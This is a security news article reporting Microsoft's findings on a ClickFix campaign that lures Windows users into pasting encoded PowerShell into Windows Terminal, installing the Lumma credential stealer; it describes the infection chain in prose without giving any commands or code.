Microsoft spots ClickFix campaign getting users to self-pwn on Windows Terminal
A new twist on the long-running ClickFix scam is now tricking Windows users into launching Windows Terminal and pasting malware into it themselves – handing the credential-stealing Lumma infostealer the keys to their browser vault.
According to Microsoft Threat Intelligence, the campaign surfaced in February and tweaks the familiar ClickFix playbook in a way designed to sidestep some existing security detections. Traditionally, these scams try to persuade victims to open the Windows Run dialog with the old Win + R shortcut and paste in a command supplied by a fake CAPTCHA or troubleshooting prompt. This time, the crooks are pointing users somewhere slightly different: the Windows + X → I shortcut, which launches Windows Terminal.
While security tools have become fairly good at spotting suspicious activity launched from the Run dialog, Windows Terminal is a legitimate administrative tool that many developers open every day. In other words, it looks normal enough to blend into routine system activity, which is exactly what attackers want.
The scam itself sticks to the same tried-and-tested social engineering formula. Victims land on a web page posing as a verification prompt, CAPTCHA check, or troubleshooting guide. The page then instructs them to copy a command, and paste it into Windows Terminal, usually framed as something harmless like verifying their connection or fixing an error.
What the victims actually paste is a heavily encoded PowerShell command that kicks off a surprisingly elaborate chain of events.
In one version of the attack, the command unpacks itself and pulls down a renamed copy of the 7-Zip archive utility along with a compressed payload. The archive tool then extracts further components that establish persistence, fiddle with Microsoft Defender exclusions, and begin collecting system and browser data. The final stage deploys Lumma Stealer, a common infostealer that injects itself into Chrome and Edge processes to siphon off stored login credentials and other browser goodies.
A second infection path uses a similarly encoded command to fetch a batch script that drops a VBScript file and executes it using a mix of built-in Windows utilities, including MSBuild.
At that point, the script reaches out to cryptocurrency blockchain infrastructure – a trick sometimes dubbed "EtherHiding" – before launching the same credential-harvesting routine.
ClickFix campaigns have been circulating for well over a year now, largely because they rely on the depressingly reliable tactic of persuading users to run the malicious command themselves. The scheme has already been used to spread various infostealers and other nasties by disguising the instructions as routine verification steps.
Microsoft's latest findings suggest the scammers are simply adapting the formula to keep one step ahead of security tools – and betting that if a command runs in a legitimate terminal window, many users will assume it's just fine. ®
